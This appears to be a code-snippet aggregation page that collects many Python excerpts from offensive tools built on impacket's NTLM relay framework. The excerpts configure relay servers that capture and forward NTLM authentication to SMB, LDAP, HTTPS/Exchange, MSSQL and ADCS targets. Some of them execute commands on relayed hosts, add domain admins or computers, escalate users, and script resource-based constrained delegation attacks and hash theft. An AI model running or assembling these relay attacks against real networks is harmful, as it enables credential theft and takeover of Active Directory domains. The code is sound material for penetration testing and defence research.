Esempio n. 1
0
    def __init__(self):
        NTLMRelayxConfig.__init__(self)

        # Auth options
        self.dcip = None
        self.aeskey = None
        self.hashes = None
        self.password = None
        self.israwpassword = False
        self.salt = None

        # Krb options
        self.format = 'ccache'

        # LDAP options
        self.dumpdomain = True
        self.addda = True
        self.aclattack = True
        self.validateprivs = True
        self.escalateuser = None
        self.addcomputer = False
        self.delegateaccess = False

        # Custom options
        self.victim = None
Esempio n. 2
0
    def __init__(self):
        NTLMRelayxConfig.__init__(self)

        # Auth options
        self.dcip = None
        self.aeskey = None
        self.hashes = None
        self.password = None
        self.israwpassword = False
        self.salt = None

        # Krb options
        self.format = 'ccache'
Esempio n. 3
0
def start_servers(options, threads):
    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setRunSocks(options.socks, socksServer)
        c.setTargets(targetSystem)
        c.setExeFile(options.e)
        c.setCommand(options.c)
        c.setEnumLocalAdmins(options.enum_local_admins)
        c.setEncoding(codec)
        c.setMode(mode)
        c.setAttacks(PROTOCOL_ATTACKS)
        c.setLootdir(options.lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.escalate_user)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)
        c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
        c.setIPv6(options.ipv6)
        c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
        c.setSMB2Support(options.smb2support)
        c.setInterfaceIp(options.interface_ip)


        #If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode('REDIRECT')
            c.setRedirectHost(options.r)

        #Use target randomization if configured and the server is not SMB
        #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
        if server is not SMBRelayServer and options.random:
            c.setRandomTargets(True)

        s = server(c)
        s.start()
        threads.add(s)
    return c
Esempio n. 4
0
        logging.info("Running HTTP server in redirect mode")

    if targetSystem is not None and options.w:
        watchthread = TargetsFileWatcher(targetSystem)
        watchthread.start()

    if options.socks is True:
        # Start a SOCKS proxy in the background
        s = SOCKS()
        socks_thread = Thread(target=s.serve_forever)
        socks_thread.daemon = True
        socks_thread.start()

    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setRunSocks(options.socks)
        c.setTargets(targetSystem)
        c.setExeFile(options.e)
        c.setCommand(options.c)
        c.setEncoding(codec)
        c.setMode(mode)
        c.setAttacks(ATTACKS)
        c.setLootdir(options.lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump,options.no_da)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)
        c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max)
        c.setIPv6(options.ipv6)
        c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
Esempio n. 5
0
def start_servers(options, threads):
    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setRunSocks(options.socks, socksServer)
        c.setTargets(targetSystem)
        c.setExeFile(options.e)
        c.setCommand(options.c)
        c.setEnumLocalAdmins(options.enum_local_admins)
        c.setDisableMulti(options.no_multirelay)
        c.setEncoding(codec)
        c.setMode(mode)
        c.setAttacks(PROTOCOL_ATTACKS)
        c.setLootdir(options.lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl,
                         options.no_validate_privs, options.escalate_user,
                         options.add_computer, options.delegate_access,
                         options.dump_laps, options.dump_gmsa,
                         options.dump_adcs, options.sid)
        c.setRPCOptions(options.rpc_mode, options.rpc_use_smb,
                        options.auth_smb, options.hashes_smb,
                        options.rpc_smb_port)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)
        c.setIMAPOptions(options.keyword, options.mailbox, options.all,
                         options.imap_max)
        c.setIPv6(options.ipv6)
        c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
        c.setSMB2Support(options.smb2support)
        c.setSMBChallenge(options.ntlmchallenge)
        c.setInterfaceIp(options.interface_ip)
        c.setExploitOptions(options.remove_mic, options.remove_target)
        c.setWebDAVOptions(options.serve_image)
        c.setIsADCSAttack(options.adcs)
        c.setADCSOptions(options.template)
        c.setIsShadowCredentialsAttack(options.shadow_credentials)
        c.setShadowCredentialsOptions(options.shadow_target,
                                      options.pfx_password,
                                      options.export_type,
                                      options.cert_outfile_path)

        c.setAltName(options.altname)

        #If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode('REDIRECT')
            c.setRedirectHost(options.r)

        #Use target randomization if configured and the server is not SMB
        if server is not SMBRelayServer and options.random:
            c.setRandomTargets(True)

        if server is HTTPRelayServer:
            c.setDomainAccount(options.machine_account, options.machine_hashes,
                               options.domain)
            for port in options.http_port:
                c.setListeningPort(port)
                s = server(c)
                s.start()
                threads.add(s)
                sleep(0.1)
            continue

        elif server is SMBRelayServer:
            c.setListeningPort(options.smb_port)
        elif server is WCFRelayServer:
            c.setListeningPort(options.wcf_port)
        elif server is RAWRelayServer:
            c.setListeningPort(options.raw_port)

        s = server(c)
        s.start()
        threads.add(s)
    return c
Esempio n. 6
0
import ldap3
import ldapdomaindump
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig

attackeraccount = ('DOMAIN\\USER', 'PASSWORD')
fakecomputer = 'FAKE_COMPUTER_NAME'
targetcomputer = 'TARGET_COMPUTER_NAME'
dc = 'DC_IP'

targetsam = '{}$'.format(targetcomputer)
fakecomputersam = '{}$'.format(fakecomputer)

c = NTLMRelayxConfig()
c.addcomputer = fakecomputer
c.target = dc

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam))

logging.info('Initializing LDAP connection to {}'.format(dc))
#tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL)
logging.info('Using {} account with password ***'.format(attackeraccount[0]))
conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE)
conn.bind()
logging.info('LDAP bind OK')
Esempio n. 7
0
    action='store',
    help=
    'domain\\username:password, attacker account with write access to target computer properties (NetBIOS domain name must be used!)'
)

if len(sys.argv) == 1:
    parser.print_help()
    print(
        '\nExample: ./rbcd.py -dc-ip 10.10.10.1 -t WEB -f FAKECOMP ECORP\\test:Spring2020'
    )
    sys.exit(1)

options = parser.parse_args()

attackeraccount = options.identity.split(':')
c = NTLMRelayxConfig()
c.addcomputer = options.f
c.target = options.dc_ip

if options.hashes:
    # support only :NTHASH format (no LM)
    attackerpassword = ("aad3b435b51404eeaad3b435b51404ee:" +
                        options.hashes.split(":")[1]).upper()
else:
    attackerpassword = attackeraccount[1]

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info(
    'Starting Resource Based Constrained Delegation Attack against {}$'.format(
        options.t))
Esempio n. 8
0
def startServers(targetURL,
                 interface,
                 hashOutputFile=None,
                 serverIP="127.0.0.1",
                 serverPort=8000):
    PoppedDB = Manager().dict()  # A dict of PoppedUsers
    PoppedDB_Lock = Lock()  # A lock for opening the dict

    relayServers = (SMBRelayServer, HTTPRelayServer)
    serverThreads = []

    C_Attack = {"HTTPS": ExchangePlugin}
    for server in relayServers:
        c = NTLMRelayxConfig()
        c.setProtocolClients({"HTTPS": HTTPSRelayClient})
        c.setTargets(TargetsProcessor(singleTarget=str(targetURL + "/")))
        c.setOutputFile(hashOutputFile)
        c.setMode('RELAY')
        c.setAttacks(C_Attack)
        c.setInterfaceIp(interface)
        c.PoppedDB = PoppedDB  # pass the poppedDB to the relay servers
        c.PoppedDB_Lock = PoppedDB_Lock  # pass the poppedDB to the relay servers
        s = server(c)
        s.start()
        serverThreads.append(s)
    logging.info("Relay servers started")

    # Now start the WebUI on 127.0.0.1:8000
    owa = Thread(target=OWAServer.runServer,
                 args=(
                     serverIP,
                     serverPort,
                     PoppedDB,
                     PoppedDB_Lock,
                 ))
    owa.daemon = True
    owa.start()

    try:
        while owa.isAlive():
            pass
    except KeyboardInterrupt, e:
        logging.info("Shutting down...")
        for thread in serverThreads:
            thread.server.shutdown()
Esempio n. 9
0
        watchthread.start()

    threads = set()
    socksServer = None
    if options.socks is True:
        # Start a SOCKS proxy in the background
        socksServer = SOCKS()
        socksServer.daemon_threads = True
        socks_thread = Thread(target=socksServer.serve_forever)
        socks_thread.daemon = True
        socks_thread.start()
        threads.add(socks_thread)

    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setRunSocks(options.socks, socksServer)
        c.setTargets(targetSystem)
        c.setExeFile(options.e)
        c.setCommand(options.c)
        c.setEncoding(codec)
        c.setMode(mode)
        c.setAttacks(ATTACKS)
        c.setLootdir(options.lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump, options.no_da)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)
        c.setIMAPOptions(options.keyword, options.mailbox, options.all,
                         options.imap_max)
Esempio n. 10
0
    #print targetSystem.targets
    if targetSystem is not None and options.w:
        watchthread = TargetsFileWatcher(targetSystem)
        watchthread.start()

    if options.lootdir is not None:
        lootdir = options.lootdir
    else:
        lootdir = '.'

    exeFile = options.e
    Command = options.c

    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setTargets(targetSystem)
        c.setExeFile(exeFile)
        c.setCommand(Command)
        c.setMode(mode)
        c.setAttacks(ATTACKS)
        c.setLootdir(lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump, options.no_da)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)

        #If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode('REDIRECT')
            c.setRedirectHost(options.r)
Esempio n. 11
0
        watchthread.start()

    if options.lootdir is not None:
        lootdir = options.lootdir
    else:
        lootdir = '.'

    #Temp
    #mode = 'TRANSPARENT'

    exeFile = options.e
    Command = options.c

    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setTargets(targetSystem)
        c.setExeFile(exeFile)
        c.setCommand(Command)
        c.setMode(mode)
        c.setAttacks(ATTACKS)
        c.setLootdir(lootdir)
        c.setOutputFile(options.output_file)

        #If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode('REDIRECT')
            c.setRedirectHost(options.r)

        if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
            c.setDomainAccount( options.machine_account,  options.machine_hashes,  options.domain)
Esempio n. 12
0
def startServers(passargs):
    targetSystem = passargs.target_host
    privuser = passargs.user
    PoppedDB = Manager().dict()  # A dict of PoppedUsers
    PoppedDB_Lock = Lock()  # A lock for opening the dict
    relayServers = (SMBRelayServer, HTTPRelayServer)
    serverThreads = []
    for server in relayServers:
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setTargets(
            TargetsProcessor(singleTarget=str("ldap://" + targetSystem),
                             protocolClients=PROTOCOL_CLIENTS))
        c.setOutputFile(None)
        c.setEncoding('ascii')
        c.setMode('RELAY')
        c.setAttacks(PROTOCOL_ATTACKS)
        c.setLootdir('.')
        c.setInterfaceIp("0.0.0.0")
        c.setLDAPOptions(True, True, True, privuser)
        c.PoppedDB = PoppedDB  # pass the poppedDB to the relay servers
        c.PoppedDB_Lock = PoppedDB_Lock  # pass the poppedDB to the relay servers
        s = server(c)
        s.start()
        serverThreads.append(s)
    logging.info("Relay servers started, waiting for connection....")
    status = exploit(passargs)
    if status:
        exp = Thread(target=gethash, args=(passargs, ))
        exp.daemon = True
        exp.start()
        try:
            while exp.isAlive():
                pass
        except KeyboardInterrupt, e:
            logging.info("Shutting down...")
            for thread in serverThreads:
                thread.server.shutdown()
Esempio n. 13
0
def start_servers(options, threads):
    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setRunSocks(options.socks, socksServer)
        c.setTargets(targetSystem)
        c.setExeFile(options.e)
        c.setCommand(options.c)
        c.setEnumLocalAdmins(options.enum_local_admins)
        c.setEncoding(codec)
        c.setMode(mode)
        c.setAttacks(PROTOCOL_ATTACKS)
        c.setLootdir(options.lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl,
                         options.no_validate_privs, options.escalate_user,
                         options.add_computer, options.delegate_access,
                         options.dump_laps, options.dump_gmsa, options.sid)
        c.setRPCOptions(options.rpc_mode, options.rpc_use_smb,
                        options.auth_smb, options.hashes_smb,
                        options.rpc_smb_port)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)
        c.setIMAPOptions(options.keyword, options.mailbox, options.all,
                         options.imap_max)
        c.setIPv6(options.ipv6)
        c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
        c.setSMB2Support(options.smb2support)
        c.setInterfaceIp(options.interface_ip)
        c.setExploitOptions(options.remove_mic, options.remove_target)
        c.setWebDAVOptions(options.serve_image)
        c.setNamedPipeOptions(options.np_name, options.np_payload,
                              options.np_pid)

        if server is HTTPRelayServer:
            c.setListeningPort(options.http_port)
            c.setDomainAccount(options.machine_account, options.machine_hashes,
                               options.domain)
        elif server is SMBRelayServer:
            c.setListeningPort(options.smb_port)

        #If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode('REDIRECT')
            c.setRedirectHost(options.r)

        #Use target randomization if configured and the server is not SMB
        if server is not SMBRelayServer and options.random:
            c.setRandomTargets(True)

        s = server(c)
        s.start()
        threads.add(s)
    return c
Esempio n. 14
0
def start_servers(options, threads):
    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setRunSocks(options.socks, socksServer)
        c.setTargets(targetSystem)
        c.setExeFile(options.e)
        c.setCommand(options.c)
        c.setEnumLocalAdmins(options.enum_local_admins)
        c.setEncoding(codec)
        c.setMode(mode)
        c.setAttacks(PROTOCOL_ATTACKS)
        c.setLootdir(options.lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl,
                         options.no_validate_privs, options.escalate_user,
                         options.add_computer, options.delegate_access)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)
        c.setIMAPOptions(options.keyword, options.mailbox, options.all,
                         options.imap_max)
        c.setIPv6(options.ipv6)
        c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
        c.setSMB2Support(options.smb2support)
        c.setInterfaceIp(options.interface_ip)

        if server is HTTPRelayServer:
            c.setListeningPort(options.http_port)
        elif server is SMBRelayServer:
            c.setListeningPort(options.smb_port)

        #If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode('REDIRECT')
            c.setRedirectHost(options.r)

        #Use target randomization if configured and the server is not SMB
        #SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
        if server is not SMBRelayServer and options.random:
            c.setRandomTargets(True)

        s = server(c)
        s.start()
        threads.add(s)
    return c
Esempio n. 15
0
        watchthread.start()

    if options.lootdir is not None:
        lootdir = options.lootdir
    else:
        lootdir = '.'

    #Temp
    #mode = 'TRANSPARENT'

    exeFile = options.e
    Command = options.c

    for server in RELAY_SERVERS:
        #Set up config
        c = NTLMRelayxConfig()
        c.setTargets(targetSystem)
        c.setExeFile(exeFile)
        c.setCommand(Command)
        c.setMode(mode)
        c.setAttacks(ATTACKS)
        c.setLootdir(lootdir)
        c.setOutputFile(options.output_file)

        #If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode('REDIRECT')
            c.setRedirectHost(options.r)

        if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
            c.setDomainAccount(options.machine_account, options.machine_hashes,
Esempio n. 16
0
    logger.init()
    print 'ridrelay v0.2 - Get domain usernames by relaying low priv creds!\n'

    logging.getLogger().setLevel(logging.INFO)
    logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)

    codec = sys.getdefaultencoding()

    targetSystem = TargetsProcessor(singleTarget=args.target,
                                    protocolClients=PROTOCOL_CLIENTS)

    threads = set()

    for server in RELAY_SERVERS:
        # Set up config
        c = NTLMRelayxConfig()
        c.setProtocolClients(PROTOCOL_CLIENTS)
        c.setRunSocks(False, None)
        c.setTargets(targetSystem)
        c.setEncoding(codec)
        c.setAttacks(ATTACKS)
        c.setOutputFile(args.out_file)
        c.setSMB2Support(True)
        c.setInterfaceIp('')
        if server == HTTPRelayServer:
            c.setMode('REFLECTION')
        else:
            c.setMode('REDIRECT')
        c.setRedirectHost(True)

        s = server(c)
Esempio n. 17
0
            mode = "RELAY"
        else:
            logging.info("Running in reflection mode")
            targetSystem = None
            mode = "REFLECTION"

    if options.r is not None:
        logging.info("Running HTTP server in redirect mode")

    if targetSystem is not None and options.w:
        watchthread = TargetsFileWatcher(targetSystem)
        watchthread.start()

    for server in RELAY_SERVERS:
        # Set up config
        c = NTLMRelayxConfig()
        c.setTargets(targetSystem)
        c.setExeFile(options.e)
        c.setCommand(options.c)
        c.setMode(mode)
        c.setAttacks(ATTACKS)
        c.setLootdir(options.lootdir)
        c.setOutputFile(options.output_file)
        c.setLDAPOptions(options.no_dump, options.no_da)
        c.setMSSQLOptions(options.query)
        c.setInteractive(options.interactive)
        c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)

        # If the redirect option is set, configure the HTTP server to redirect targets to SMB
        if server is HTTPRelayServer and options.r is not None:
            c.setMode("REDIRECT")